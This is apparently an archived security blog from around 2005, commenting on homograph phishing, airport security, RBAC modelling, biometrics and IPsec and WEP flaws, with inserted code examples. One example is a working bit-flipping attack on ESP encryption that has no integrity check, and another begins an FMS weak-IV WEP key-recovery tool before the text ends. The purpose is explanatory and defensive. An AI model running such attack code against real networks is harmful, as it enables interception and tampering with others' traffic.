Non-English Domain Names Likely Delayed - Yahoo! News

Social engineering attacks that use similar-looking characters to trick users are called homograph, or semantic, attacks. Also see this article on IDN Homograph Attacks.

Concerns about "phishing" e-mail scams will likely delay the expansion of domain names beyond non-English characters, the chairman of the Internet's key oversight agency said Friday.

Vint Cerf, head of the Internet Corporation for Assigned Names and Numbers, would not speculate on when such characters might appear but said Internet engineers must now spend time "trying to winnow down, frankly, the number of character (sets) that are allowed to be registered."

"In some of the early tests, ... it became clear we had opened up the opportunity for registering very misleading names," Cerf said in a conference call wrapping up ICANN's meetings this week in Luxembourg. "This kind of potential confusion leads to parties going to what they think are valid Web sites."

Back in February of this year, ICANN announced a request for public comment on issues with the proposed Internationalized Domain Name (IDN) standard and recognized homograph attacks as a likely attack vector.
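
Two of the checks a registry or browser can apply against misleading IDN registrations, as an added example that is not from the article or from ICANN: refusing labels that mix scripts, and folding look-alike letters to a Latin "skeleton" so a name can be compared with a known-good one. The confusables table is a constructed, partial list (Unicode's confusables.txt is the full reference) and all host names are made up.

```go
package main

import (
	"fmt"
	"strings"
	"unicode"
)

// confusables maps a few non-Latin letters to the Latin letter they render
// almost identically to in common fonts. Constructed, partial list.
var confusables = map[rune]rune{
	'\u0430': 'a', // Cyrillic а
	'\u0435': 'e', // Cyrillic е
	'\u043e': 'o', // Cyrillic о
	'\u0440': 'p', // Cyrillic р
	'\u0441': 'c', // Cyrillic с
	'\u0443': 'y', // Cyrillic у
	'\u0445': 'x', // Cyrillic х
	'\u0455': 's', // Cyrillic ѕ
	'\u0456': 'i', // Cyrillic і
	'\u04cf': 'l', // Cyrillic palochka ӏ
	'\u03bf': 'o', // Greek ο
}

// scriptOf names the script a rune belongs to; digits and hyphen are
// script-neutral and return "".
func scriptOf(r rune) string {
	switch {
	case r == '-' || unicode.IsDigit(r):
		return ""
	case unicode.Is(unicode.Latin, r):
		return "Latin"
	case unicode.Is(unicode.Cyrillic, r):
		return "Cyrillic"
	case unicode.Is(unicode.Greek, r):
		return "Greek"
	default:
		return "Other"
	}
}

// LabelReport describes one dot-separated label of a host name.
type LabelReport struct {
	Label    string
	Scripts  []string // distinct scripts seen, in first-seen order
	Mixed    bool     // more than one script inside a single label
	Skeleton string   // label with confusables folded to Latin
}

// Analyze lower-cases host and reports each label. A label mixing scripts
// is the pattern IDN guidance asks registries to refuse outright.
func Analyze(host string) []LabelReport {
	var out []LabelReport
	for _, label := range strings.Split(strings.ToLower(host), ".") {
		rep := LabelReport{Label: label}
		seen := map[string]bool{}
		var sk strings.Builder
		for _, r := range label {
			if s := scriptOf(r); s != "" && !seen[s] {
				seen[s] = true
				rep.Scripts = append(rep.Scripts, s)
			}
			if l, ok := confusables[r]; ok {
				sk.WriteRune(l)
			} else {
				sk.WriteRune(r)
			}
		}
		rep.Mixed = len(rep.Scripts) > 1
		rep.Skeleton = sk.String()
		out = append(out, rep)
	}
	return out
}

// Skeleton joins the per-label skeletons back into a host name.
func Skeleton(host string) string {
	var parts []string
	for _, rep := range Analyze(host) {
		parts = append(parts, rep.Skeleton)
	}
	return strings.Join(parts, ".")
}

// Suspicious reports whether host mixes scripts in a label, or renders like
// one of the known-good names without being that name (an all-Cyrillic
// label slips past the mixed-script check and is caught here).
func Suspicious(host string, knownGood []string) (bool, string) {
	for _, rep := range Analyze(host) {
		if rep.Mixed {
			return true, fmt.Sprintf("label %q mixes scripts %v", rep.Label, rep.Scripts)
		}
	}
	sk := Skeleton(host)
	for _, good := range knownGood {
		if !strings.EqualFold(host, good) && sk == Skeleton(good) {
			return true, fmt.Sprintf("renders like %q", good)
		}
	}
	return false, ""
}

func main() {
	good := []string{"scope.example"} // constructed known-good name
	for _, h := range []string{"scope.example", "sc\u043epe.example", "\u0455\u0441\u043e\u0440\u0435.example"} {
		bad, why := Suspicious(h, good)
		fmt.Printf("%-16s suspicious=%-5v %s\n", h, bad, why)
	}
}
```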

CNN.com - Cell phone service disabled in New York tunnels - Jul 12, 2005

Cell phone service was disabled inside the four tunnels leading into Manhattan after the terrorist bombings in London, but Mayor Michael Bloomberg questioned Monday whether the move "makes the most sense."

I'm with Mayor Bloomberg. I don't think it makes sense at all for at least four major reasons:

  1. Terrorists don't necessarily have to call a cellphone in order to use it to detonate a bomb. I have read about them using the built-in timer. And this article actually corroborates this.
    In the Madrid explosions, alarms in cells phones were set on vibration, which sent electric impulses to the copper detonators connected to the explosives, Spanish authorities said.
    So, this measure indicates that someone does not understand the threat.
  2. More importantly, suppressing cellular service can only serve to incite panic--especially if there were to be another bombing or similar terrorist attack. I remember on 9/11 how distracted and distraught everyone who knew people in New York was when they could not get through to anyone to make sure everyone was all right. Now, if that isn't terrorism, I don't know what is. So, shutting down cell phone service really is going to help the terrorists with their mission.
  3. Cellphones on the front lines can be a great help in reporting attacks. Faster reporting and more accurate directions to authorities can save lives if there were to be another attack.
  4. The Department of Homeland Security said that this goes against their guidelines of keeping the cellphone system up and working for rescue authorities to use in the event of an emergency:
    The Department of Homeland Security said the decision in New York to cut off cellular service was made without any recommendation by the federal government's National Communications System, which ensures communications are available during national emergencies.

And while we're on the subject of anti-terrorist governmental reactions that don't make any sense... (Bruce Schneier is really going to have a field day with these):

PCWorld.com - Feds Seek Wiretap Access for Mobile Calls on Planes

If cell phones and other handheld wireless devices are allowed to be used on aircraft by the U.S. Federal Communications Commission, the U.S. Department of Justice wants built-in terrorism-fighting capabilities to allow fast wiretaps and quick ways to disconnect conversations between terrorists.

This appeared in the October 2004 crypto-gram and is a very good description of how the current "security" measures at airports, etc. serve only to "reduce fear" and don't actually "increase security". The latter is the hard problem....

From: Anonymous
Subject: Fear and Security

This is in response to the letter you published last month by Wayne Schroeder: Fear and security are closely coupled in simple situations, like riding a motorcycle. The way to reduce the fear is to increase your safety, such as by driving more slowly. Millions of years of evolution have evolved fear as a mechanism for keeping us alive, but millions of years of evolution never had to deal with a 767. It evolved for simpler things, like bad weather, high speeds, and scary animals.

When it comes to the more complex security situations of the modern world, our natural instincts are inadequate. People still rely on them to guide them, though, like in the now-notorious Annie Jacobsen freakout. That's why we have security theater; people are trying to reduce fear, not increase safety, and they don't realize those aren't the same anymore.

That is also why people are reluctant to confront their poor choices. When you force them to do so, you are taking them from a place of reduced fear to one of heightened fear; as far as they're concerned, you're causing the fear. The rational perspective is clearly that you are making them safer, but they don't see it that way.

The motorcycle example just doesn't work because it maps easily to our evolved instincts. Modern security problems are so complicated that the ways to reduce fear have diverged from the ways to increase safety. Trying to map these primitive emotions to modern threats can't work; the gap is too large. Relying on our fears to guide us won't make us safer; it will only make it more shocking when our defenses are breached again.

Good to look back on in light of the raising of the alert (and only for public transportation...). Is the best our intelligence can do to assume that the next attack will have the same MO and style as recent ones?

Schneier on Security: Do Terror Alerts Work?

When Attorney General John Ashcroft came to Minnesota recently, he said the fact that there had been no terrorist attacks in America in the three years since September 11th was proof that the Bush administration's anti-terrorist policies were working. I thought: There were no terrorist attacks in America in the three years before September 11th, and we didn't have any terror alerts. What does that prove?

Mark Curphey's Blog

I am very methodical when it comes to security design and security reviews so I am sure that these templates will come in very handy to ensure uniform coverage of requirements and mechanisms.

My only quibble so far is that they call this "SecureUML". The UML isn't secure, nor does having a well-defined authorization model imply security (look no further than the Sarbanes-Oxley efforts that define wonderful processes and models, while the auditor testing never covers the effectiveness of the underlying mechanisms implementing these controls...)

There are a few simple steps that can help when defining authorization requirements and an extension to the Unified Modeling Language called SecureUML that is very powerful for documenting unambiguous authorization models, specifically RBAC (role-based access control). My colleague Rudolph Araujo (Security Developer MVP) has built a Visio template for creating SecureUML models that is also available here. One of the things I specifically like about UML and SecureUML is that it forces you to really think about things and promotes best practice where you are not operating on undocumented assumptions. First things first, let's define some simple steps to creating an authorization model.

1. Identify Users (actors)
2. Identify Application Specific Roles
3. Map Users to Roles Based on Business Function
4. Identify Resources
5. Identify Actions
6. Identify Authorizations Constraints
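
The six steps above worked through as an added example, not Curphey's or Araujo's code: a small RBAC model for a constructed expense-approval system with users (step 1), roles (2), user-to-role assignment (3), resources (4), actions (5) and authorization constraints (6), plus a separation-of-duty rule between two roles.

```go
package main

import (
	"errors"
	"fmt"
)

// Permission is an action on a resource (steps 4 and 5).
type Permission struct{ Resource, Action string }

// Context carries the state an authorization constraint (step 6) may inspect.
type Context struct {
	Owner  string  // user who created the resource instance
	Amount float64 // monetary value of the instance
}

// Constraint is the predicate attached to a grant; it plays the part of the
// OCL constraint on a SecureUML permission.
type Constraint func(user string, ctx Context) bool

// Model holds roles and their (constrained) grants, plus user assignments.
type Model struct {
	grants    map[string]map[Permission][]Constraint // role -> permission -> constraints
	userRoles map[string]map[string]bool             // user -> roles held (step 3)
	exclusive [][2]string                            // role pairs no single user may hold
}

func NewModel() *Model {
	return &Model{grants: map[string]map[Permission][]Constraint{}, userRoles: map[string]map[string]bool{}}
}

// Grant lets role perform p, subject to every listed constraint.
func (m *Model) Grant(role string, p Permission, cs ...Constraint) {
	if m.grants[role] == nil {
		m.grants[role] = map[Permission][]Constraint{}
	}
	m.grants[role][p] = append(m.grants[role][p], cs...)
}

// Exclude declares two roles mutually exclusive (static separation of duty).
func (m *Model) Exclude(a, b string) { m.exclusive = append(m.exclusive, [2]string{a, b}) }

var ErrSeparationOfDuty = errors.New("assignment violates separation of duty")

// Assign maps a user to a role and refuses to give one person both halves
// of an exclusive pair.
func (m *Model) Assign(user, role string) error {
	if _, ok := m.grants[role]; !ok {
		return fmt.Errorf("unknown role %q", role)
	}
	for _, pair := range m.exclusive {
		if (pair[0] == role && m.userRoles[user][pair[1]]) || (pair[1] == role && m.userRoles[user][pair[0]]) {
			return ErrSeparationOfDuty
		}
	}
	if m.userRoles[user] == nil {
		m.userRoles[user] = map[string]bool{}
	}
	m.userRoles[user][role] = true
	return nil
}

// Allowed is the access decision: some role held by user grants p and every
// constraint on that grant holds for ctx. Unknown users, roles and
// permissions are denied because nothing grants them.
func (m *Model) Allowed(user string, p Permission, ctx Context) bool {
	for role := range m.userRoles[user] {
		cs, ok := m.grants[role][p]
		if !ok {
			continue
		}
		satisfied := true
		for _, c := range cs {
			if !c(user, ctx) {
				satisfied = false
				break
			}
		}
		if satisfied {
			return true
		}
	}
	return false
}

// ExpenseModel is a constructed model: employees submit and read their own
// claims; managers approve others' claims up to a limit; Finance approves
// anything but may not also be a manager.
func ExpenseModel() *Model {
	m := NewModel()
	submit, approve, read := Permission{"Expense", "submit"}, Permission{"Expense", "approve"}, Permission{"Expense", "read"}
	notOwner := func(u string, c Context) bool { return c.Owner != u } // no self-approval
	m.Grant("Employee", submit)
	m.Grant("Employee", read, func(u string, c Context) bool { return c.Owner == u })
	m.Grant("Manager", read)
	m.Grant("Manager", approve, notOwner, func(_ string, c Context) bool { return c.Amount <= 5000 })
	m.Grant("Finance", approve, notOwner)
	m.Exclude("Manager", "Finance")
	return m
}

func main() {
	m := ExpenseModel()
	for _, a := range [][2]string{{"alice", "Employee"}, {"bob", "Manager"}, {"carol", "Finance"}} {
		if err := m.Assign(a[0], a[1]); err != nil {
			fmt.Println(err)
		}
	}
	fmt.Println("bob also Finance:", m.Assign("bob", "Finance")) // separation of duty
	approve := Permission{"Expense", "approve"}
	fmt.Println("bob approves alice's 3000:", m.Allowed("bob", approve, Context{Owner: "alice", Amount: 3000}))   // true
	fmt.Println("bob approves alice's 9000:", m.Allowed("bob", approve, Context{Owner: "alice", Amount: 9000}))   // false
	fmt.Println("carol approves alice's 9000:", m.Allowed("carol", approve, Context{Owner: "alice", Amount: 9000})) // true
}
```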

Foundstone, Inc. Strategic Security

Have not checked it out yet. Sounds promising. Although it would be nice to have a scanning tool that can do application security checks regardless of whether the protocol is HTML over HTTP, XML over HTTP, SOAP, etc. Many of the attacks and scanning signatures will be the same; only the formatting differs, and perhaps the detection of success or failure of a test. I'd be interested in knowing more about what they encountered as to whether the differences are significant enough to warrant a separate tool.

SSL Organization Vulnerabilities

The following example web site spoofs demonstrate the vulnerabilities that exist if first-generation vetting practices for digital certificates are used in combination with new browser enhancements that bring the certificate's Organization information forward and display it next to the SSL lock symbol.

Spoofers these days adapt very fast to new technology meant to counter their tactics. This is one case in which adversaries generate certificates with Organization information that matches the site they want to spoof, and dumb "Trusted" third-party CAs happily sign those certificates. Some browsers, such as Opera, are now showing the organization information directly to users to help them make better trust decisions. Unfortunately, this is rearranging deck chairs on the Titanic, since the SSL TTP model is totally broken: it does not allow for adequate authentication of sites to end users, hence the rampant phishing attacks and the man-in-the-middle attacks that will follow (my prediction).

Fear of Spyware Changing Online Habits - Yahoo! News

Internet users worried about spyware and adware are shunning specific Web sites, avoiding file-sharing networks, even switching browsers.

Many have also stopped opening e-mail attachments without first making sure they are safe, the Pew Internet and American Life Project said in a study issued Wednesday.

Some good indications that end users are gaining awareness of the security problems in today's Internet environment. Go read the full report. It has a lot more meat than the wire stories.

Following up on my earlier posting on TSA idiocy... Supposedly this was also at SeaTac.

Just met with some friends tonight and the subject of airline/airport "security" came up. A true story about a recent run-in with TSA:

85-year-old resident of Washington state arrives home after an international flight where he had successfully taken about six different flight legs without incident carrying on a small watch/clock repair toolkit with him in his carry-on luggage. On the final leg, he is accosted by TSA because he is carrying a 2 inch hammer in this kit with a metal head and wooden handle!! The TSA tells him that tools are prohibited and that they are going to confiscate this tiny hammer.

Well, they pleaded with TSA:

  • The man is 85 years old and lives in Seattle
  • Oh, by the way, he had no problems on the other six legs of our flight and this is the final leg.
  • He had made the hammer himself with his own hands years ago--both the handle and the metal head. It is a one-of-a-kind and a cherished family heirloom.
  • Are terrorists (or _anyone_) known to attack people with 2 inch hammers?

But, the TSA, protecting all of us from 2 inch hammer banditos, refused to budge. The family got several levels of TSA and airport staff involved to press the issue yet their pleas still fell on deaf ears.

To make matters worse, the TSA staff were nasty about the situation too. For example, when asked what they were going to do with the hammer after confiscating it, they said that it would be "discarded", as if it were something with only utilitarian value. No thought was given to the real human lives in front of them that were being negatively impacted by this policy. I guess "things have changed after 9-11": Americans are self-righteous and don't care about the American public? No thought is expended to question the TSA policy, which does in fact prohibit bringing quote-unquote "hammers" on board; I'm sure the policy writers did not intend for it to apply to 2 inch hammers! Think people!! Sheesh.

Yeah, people supposedly trying to protect us are maliciously obedient to policies that address false risks not based on a threat model, let alone a reasonable one. And they only care about the letter of the law and not the spirit. The risk mitigation lies in the spirit of the law. Stupidity and a police state lie in strict interpretation of the letter of the law, especially in the case of the TSA, where Americans have no ability to confront their accusers and ensure any sense of just treatment under the law.

A great quote I have heard someone say (about "no tolerance" school gun/knife/drug/etc. policies) is that "no tolerance" policies like these are really "no thought" policies. They allow people to be maliciously obedient to idiotic policies and take away any hint of the rational thought process that would normally prevent humans (formerly known to be rational actors) from arriving at ridiculous conclusions in benign situations.

A great paper to read up on, especially given that Phishing is showing us that the "Trusted Third Party" model as implemented in today's web browsers is horribly broken.

Don Davis' Cryptography Articles. Specifically, read "Compliance Defects in Public-Key Cryptography".

Abstract:
Public-key cryptography has low infrastructural overhead because public-key users bear a substantial but hidden administrative burden. A public-key security system trusts its users to validate each others' public keys rigorously and to manage their own private keys securely. Both tasks are hard to do well, but public-key security systems lack a centralized infrastructure for enforcing users' discipline. A "compliance defect" in a cryptosystem is such a rule of operation that is both difficult to follow and unenforceable. This paper presents five compliance defects that are inherent in public-key cryptography; these defects make public-key cryptography more suitable for server-to-server security than for desktop applications.

The slides (PDF, 78 Kbytes) discuss a topic that the paper only touches upon: the complexity of thoroughly checking a certificate issuance-chain, to see whether any of the certs in the chain have been revoked recently. Even in the best case, this is a surprisingly messy procedure. See slides 12 & 13, and their annotations.

Best quote:

"Whenever someone thinks that they can replace SSL/SSH with something much better that they designed this morning over coffee, their computer speakers should generate some sort of penis-shaped sound wave and plunge it repeatedly into their skulls until they achieve enlightenment."

-- Peter Gutmann, http://mail-archive.com/cryptography@metzdowd.com/msg00891.html

The rest of the post is great as well, with a "sound" warning about the CIPE VPN.

This is a true story!

The link to the story below is stale now, but this one still works:

Hackers tell man he's "too fat" to eat at Burger King - silicon.com

http://www.ananova.com/news/story/sm_853744.html?menu=news.latestheadlines

Burger King customers told: 'You are too fat to have a Whopper'

Police believe teenage pranksters are hacking into the wireless frequency of a US Burger King drive-through speaker to tell potential customers they are too fat for fast food.

Policeman Gerry Scherlink said the pranksters told one customer who had just placed an order: "You don't need a couple of Whoppers. You are too fat. Pull ahead."

The offenders are reportedly tapping into the wireless frequency at the restaurant in Troy, Michigan. Police believe the culprits are watching and broadcasting from close range.

Officer Scherlinck said the men are telling customers who order a Coca-Cola that, "We don't have Coke." And when the customer asks what they do have, the hacker would say: "We don't have anything. Pull ahead."

But what has managers concerned is the profanity the hackers are using, according to police.

A drive-through customer has told police if he had children with him in the car and someone used profanity, he would have been upset.

Burger King franchise owner Tony Versace issued the following statement in response to the incidents: "We apologise to our customers who've been insulted by the use of this drive-through speaker."

Management at the fast-food restaurant are reportedly trying to change the radio frequency used for the speakers, reports Local 4.

This story from my hometown of Seattle is further proof that the current airport security procedures are nothing more than window dressing and are leading to the loss of civil rights for innocent people.

When was the last time you heard about these security procedures actually catching a terrorist?

komo news | 'This Is Not Right'

DES MOINES - Cecilia Beaman is a 57-year-old grandmother, a principal at Pacific Middle School in Des Moines, and as of Sunday is also a suspected terrorist.

"This is not right," she told us. "It's not right!"

During the stay she made sandwiches for the kids and was careful to pack the knives she used to prepare those sandwiches in her checked luggage. She says she even alerted security screeners that the knives were in her checked bags and they told her that was OK.

But Beaman says she couldn't find a third knife. It was a 5 1/2 inch bread knife with a rounded tip and a serrated edge. She thought she might have lost or misplaced it during the trip.

On the trip home, screeners with the Transportation Security Administration at Los Angeles International Airport found it deep in the outside pocket of a carry-on cooler. Beaman apologized and told them it was a mistake.

"You've committed a felony," Beaman says a security screener announced. "And you're considered a terrorist."

Beaman says she was told her name would go on a terrorist watch-list and that she would have to pay a $500 fine.

And to make it worse, you are guilty without the ability to confront your accuser and clear your name.

She says screeners refused to give her paperwork or documentation of her violation, documentation of the pending fine, or a copy of the photograph of the knife.

"They said 'no' and they said it's a national security issue. And I said what about my constitutional rights? And they said 'not at this point ... you don't have any'."

AT&T plans CNN-style security channel

Security experts at AT&T are about to take a page from CNN's playbook. Within the next year they plan to begin delivering a video streaming service that will carry Internet security news 24/7, according to the executive in charge of AT&T Labs.

The service, which currently goes by the codename Internet Security News Network (ISN), is under development at AT&T Labs, but it will be offered as an additional service to the company's customers within the next nine to 12 months, according to Hossein Eslambolchi, president of AT&T's Global Networking Technology Services and AT&T Labs.

ISN will look very much like Time Warner's Cable News Network, except that it will be broadcast exclusively over the Internet, Eslambolchi said. "It's like CNN," he said. "When a new attack is spotted, we'll be able to offer constant updates, monitoring, and advice."

Given the kinds of horrible "sky is falling" coverage on mainstream media of security items in the past, perhaps this can help raise the bar?

Bogus analysis led to terror alert in Dec. 2003 - Lisa Myers & the NBC Investigative Unit - MSNBC.com

WASHINGTON - Christmas 2003 became a season of terror after the federal government raised the terror alert level from yellow to orange, grimly citing credible intelligence of another assault on the United States.

"These credible sources," announced then-Secretary of Homeland Security
Tom Ridge, "suggest the possibility of attacks against the homeland
around the holiday season and beyond."

For weeks, America was on edge as security operations went into high
gear. Almost 30 international flights were canceled, inconveniencing
passengers flying Air France, British Air, Continental and Aero Mexico.

But senior U.S. officials now tell NBC News that the key piece of
information that triggered the holiday alert was a bizarre CIA analysis,
which turned out to be all wrong.

CIA analysts mistakenly thought they'd discovered a mother lode of
secret al-Qaida messages. They thought they had found secret messages on
Al-Jazeera, the Arabic-language television news channel, hidden in the
moving text at the bottom of the screen, known as the "crawl,"
where news headlines are summarized.

And the critics come out:

"I'm astonished," says author and intelligence expert Jim Bamford, "that they would put so much credibility in such a weak source of intelligence."

Bamford says the CIA shouldn't be criticized for considering the theory,
but that analysts should have weighed how implausible it was.

"What you have to do is judge the intelligence versus what your actions
are going to be. And this is the equivalent, basically, of looking at
tea leaves," Bamford says.

I find it very interesting that steganography was the cause for raising the alert level. The article says the messages were supposedly found "in the moving text" in the "crawl", which would seem to implicate Al-Jazeera in communicating secret messages from terrorists, since they control the crawl and would presumably have authored the content. The only way they wouldn't be implicated would be if they had been scrolling direct quotes from terrorists.

But is the "intelligence" applied to the "steganographic data" (flight numbers, etc.) that was "found" simply masking the fact that the CIA is resorting to numerology? Mining arbitrary data for significance where there is none, ala The Bible Code? The reference to reading "tea leaves" above is apropos...

What I'm also curious about is who leaked the information about why we raised the terror alert level? You would think that would be a national security secret--even now. Makes both the CIA and the decision makers in Homeland security look like idiots to put this information out there.

"It is better to keep your mouth closed and let people think you are a fool than to open it and remove all doubt" --Mark Twain

Chris Hill's biometrics thesis:

This is a very interesting development. It challenges a key assumption that people have made about biometrics:

"that stored biometrics pose no threat to their owner (if they are stolen by another party), because it is not possible to recreate the original biometric from the stored data."

So, if attackers can compromise the digital representation of a biometric (from storage, or by sniffing it in transit with, e.g., a USB sniffer or keyboard sniffer), they can potentially bypass biometric systems: they can recreate a new physical biometric artefact whose properties are indistinguishable from the original as far as the matcher is concerned.

"I demonstrated that it is possible to recreate a biometric artefact that is equivalent to the original biometric provided to the system. This means that while a third party will not be able to generate the original biometric, they will be able to generate something that is indistinguishable from it, as far as the biometric software is concerned."

Adam Shostack also had some additional comments on this today, pointing out the privacy implications of such a breach:

The answer is you can reconstruct fingerprints from common systems.

Daniel David Walker referred me to some work by Andy Adler, who pointed
out Ross, Shah and Jain, "Towards Reconstructing Fingerprints from
Minutiae Points."[1]

[1] http://www.csee.wvu.edu/~ross/pubs/RossReconstruct_SPIE05.pdf

Some additional tidbits are on my blog at
http://www.emergentchaos.com/archives/001443.html

Imagine lost biometric passports allowing the creation of counterfeit passports with "real" biometric data on them. And further imagine trying to prove that it wasn't you who bombed that plane in Lebanon. "But we logged you going through security...and biometrics are _unique_ and _unforgeable_". *Shiver*

digg this!| | Comments (0) | TrackBacks (2)

Slashdot | Washington State Outlaws Spyware

the Governor of Washington signs a bill outlawing spyware (bill history) which imposes penalties of $100,000 per violation.

This is a step in the right direction. I am not sure if it will be effective, due to the jurisdictional and technological difficulties of tracking, identifying, and prosecuting purveyors of spyware. State and federal anti-spam legislation has not exactly curbed spam dramatically. But this clarification of the computer crime statutes is helpful to avoid ambiguity.

Also of interest to me now is that Washington also passed an anti-phishing law.

digg this!| | Comments (0) | TrackBacks (0)

Ohio Agents Use Woman's Identity in Strip-Bar Sting: Internal Affairs at Officer.com

This is absolutely unbelievable! Imagine if the state was to damage your reputation or financial status (e.g. FICO score or credit worthiness) due to the unauthorized use of your identity!

Nasal said the ploy was legal because of a change in Ohio's law the previous year aimed at curbing identity theft. The law allows police to use a person's identity within the context of an investigation, he said.

The problem of identity theft is the persistent lack of decent capabilities in the financial industry to reliably authenticate claimed identities. I don't have a perfect solution, but the status quo solves the wrong problems: people are allowed to simply claim an identity (not prove it), and the industry keeps plugging fingers in the dike trying to keep "private" the information that makes such a claim work (_identifying_ information that is allowed to be used as _authenticating_ information), rather than implementing a real authentication solution. And they wonder why identity theft is increasing in double-digit percentages every year...

digg this!| | Comments (0) | TrackBacks (0)

TheDenverChannel.com - Slideshow

The American public can rest easy now that these penguins have been rigorously vetted by the TSA. Someone managing the Terrorist Watch List must have recently seen one of the Batman movies. That was _just a movie_.


digg this!| | Comments (0) | TrackBacks (0)

NISCC Vulnerability Advisory IPSEC - 004033

From what I have read on this, the flaw in ESP will only affect you if you are using ESP for confidentiality protection only (no integrity check in ESP) and are relying on other layers for integrity protection (e.g. AH or the application layer). I would never recommend you configure IPSec in this manner. Confidentiality protection without integrity protection in the same layer is not very useful IMHO. And it can be dangerous, as this flaw indicates.
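To make the point concrete, here is an added example of my own (not code from the NISCC advisory or from any IPsec implementation). It uses a hash-derived keystream as a stand-in for an unauthenticated CTR-style ESP transform, shows an attacker who knows only the packet layout and the original destination redirecting the inner packet by flipping ciphertext bits, and then shows the same modification being rejected once an HMAC integrity check value is attached encrypt-then-MAC style. The keystream construction, the toy packet layout, the 12-byte ICV length, and the keys and addresses are all assumptions made for the demonstration.

```python
"""Added example: ESP-style encryption without an integrity check is malleable."""
import hashlib
import hmac
import ipaddress
import struct

ICV_LEN = 12  # truncated HMAC, in the style of ESP's 96-bit ICV (assumption)


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Stand-in CTR-style keystream: SHA-256(key || iv || counter) blocks.

    Not a real ESP transform; any unauthenticated stream or CTR mode is
    malleable in exactly this way, and CBC is malleable one block later.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + iv + struct.pack(">I", counter)).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def build_inner_packet(src: str, dst: str, payload: bytes) -> bytes:
    """Toy inner packet: 4-byte source, 4-byte destination, payload (assumed layout)."""
    return ipaddress.IPv4Address(src).packed + ipaddress.IPv4Address(dst).packed + payload


def parse_inner_packet(pkt: bytes):
    return (str(ipaddress.IPv4Address(pkt[:4])), str(ipaddress.IPv4Address(pkt[4:8])), pkt[8:])


def encrypt_only(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Confidentiality only: what ESP gives you with no authentication algorithm."""
    return xor_bytes(plaintext, keystream(key, iv, len(plaintext)))


decrypt_only = encrypt_only  # XOR with the same keystream


def redirect_ciphertext(ciphertext: bytes, old_dst: str, new_dst: str) -> bytes:
    """Attacker's move: no key, only knowledge of the layout and the original destination."""
    delta = xor_bytes(ipaddress.IPv4Address(old_dst).packed, ipaddress.IPv4Address(new_dst).packed)
    return ciphertext[:4] + xor_bytes(ciphertext[4:8], delta) + ciphertext[8:]


def encrypt_then_mac(key: bytes, mac_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Confidentiality plus integrity in the same layer: ciphertext || ICV over (iv || ciphertext)."""
    ct = encrypt_only(key, iv, plaintext)
    icv = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()[:ICV_LEN]
    return ct + icv


def verify_then_decrypt(key: bytes, mac_key: bytes, iv: bytes, data: bytes):
    """Returns the plaintext, or None when the packet must be dropped."""
    ct, icv = data[:-ICV_LEN], data[-ICV_LEN:]
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()[:ICV_LEN]
    if not hmac.compare_digest(icv, expected):
        return None
    return decrypt_only(key, iv, ct)


def demo():
    """Both outcomes for one constructed packet; keys and addresses are made up."""
    key, mac_key, iv = b"\x11" * 32, b"\x22" * 32, b"\x00" * 8
    pkt = build_inner_packet("10.0.0.1", "10.0.0.5", b"GET /secret HTTP/1.0\r\n")
    tampered = redirect_ciphertext(encrypt_only(key, iv, pkt), "10.0.0.5", "192.0.2.99")
    unprotected_result = parse_inner_packet(decrypt_only(key, iv, tampered))
    tampered_auth = redirect_ciphertext(encrypt_then_mac(key, mac_key, iv, pkt), "10.0.0.5", "192.0.2.99")
    protected_result = verify_then_decrypt(key, mac_key, iv, tampered_auth)
    return unprotected_result, protected_result


if __name__ == "__main__":
    print(demo())
```

Without the ICV the receiver decrypts a perfectly well-formed packet addressed to 192.0.2.99 and has no way to know the sender wrote 10.0.0.5. With a CBC-mode cipher (the usual ESP transform) the flipped bits land in the following plaintext block and the current block is garbled, but the lesson is the same: if integrity is checked somewhere else, the decrypted header has already been acted on by the time anything notices.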

digg this!| | Comments (0) | TrackBacks (0)

Hyper-Threading considered harmful

This is an interesting case where a hardware flaw can be used to subvert software security.

I find it fun to ask vendors who create their own OS and processors for appliances how they ensure things such as memory page protection. I get a lot of blank stares. They often focus entirely on the macro-level security in their software and have spent little to no time addressing the basic hardware and OS-level security issues that are taken for granted by software authors.

digg this!| | Comments (0) | TrackBacks (0)

The Washington Monthly

here's a question: do you think the Italian computer whizzes will be any more competent than their American counterparts when they release their report? The U.S. report is full of redactions, as you can see in the picture above, but once again an American agency has used the searchable PDF format to distribute a report, and all you have to do is save the report as a text file in order to recover all the redacted parts.

Carjackers swipe biometric Merc, plus owner's finger | The Register

Carjackers swipe biometric Merc, plus owner's finger By John Lettice Published Monday 4th April 2005 13:52 GMT

A Malaysian businessman has lost a finger to car thieves impatient to get around his Mercedes' fingerprint security system. Accountant K Kumaran, the BBC reports, had at first been forced to start the S-class Merc, but when the carjackers wanted to start it again without having him along, they chopped off the end of his index finger with a machete.

Okay, I knew this would happen someday and this is evidence that it finally happened. Biometrics ("something you are") should only be used as a convenient _IDENTIFICATION_ mechanism as a necessary, but not a sufficient condition for _AUTHENTICATION_ of users. This is why multi-factor authentication is still important with Biometrics so you couple the "something you are" with "something you know" or "something you have".

Additionally, you should be wary of biometric hardware that can often be trivially fooled or, as in this case, is unable to adequately tell the difference between "live" and "dead" or "not-live" biometric data. Otherwise, you could be risking more than your security: the well-being and safety of your users.

digg this!| | Comments (0) | TrackBacks (0)

The Feds can own your WLAN too : TomsNetworking :

There is also a Slashdot discussion of this technique, which essentially cracks WEP implementations that are vulnerable to weak keys and uses some nice "features" of some APs to get the AP to send out additional encrypted packets to improve the speed of the attack. They can crack WEP in minutes. Pretty interesting...
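As an added illustration of the weak-key half of such an attack (my own code, not the FBI's tool or anything from the TomsNetworking article), the following implements the Fluhrer-Mantin-Shamir weak-IV attack against RC4 as WEP uses it. It assumes a 40-bit secret key, a sniffer that records each packet's cleartext 3-byte IV together with the first ciphertext byte, and the fact that every WEP data frame starts with the LLC/SNAP byte 0xAA, so the first keystream byte is known. The "sniffed" traffic is constructed inline, with every weak IV of the form (A+3, 255, x) seen once; the secret key value is an arbitrary choice for the demonstration.

```python
"""Added example: FMS weak-IV recovery of a WEP key from sniffed IVs and first ciphertext bytes."""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # every WEP data frame starts with the LLC/SNAP byte 0xAA


def rc4_ksa(key: bytes):
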